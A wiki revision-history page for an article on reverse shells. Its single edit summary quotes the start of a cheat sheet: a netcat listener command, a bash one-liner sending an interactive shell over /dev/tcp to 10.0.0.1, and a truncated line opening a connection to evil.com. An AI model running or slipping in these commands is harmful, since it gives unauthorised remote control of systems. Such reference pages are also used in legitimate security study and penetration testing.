Revision history of "Reverse Shells"

Jump to navigation Jump to search

Diff selection: Mark the radio boxes of the revisions to compare and hit enter or the button at the bottom.
Legend: (cur) = difference with latest revision, (prev) = difference with preceding revision, m = minor edit.

  • curprev 20:12, 17 November 2020Bgrambo talk contribs 1,186 bytes +1,186 Created page with "One-liner reverse shells... On the listener: $ nc -l -p 8080 -vvv On the remote host... Bash: $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 $ exec 5<>/dev/tcp/evil.com/8..." Tag: Visual edit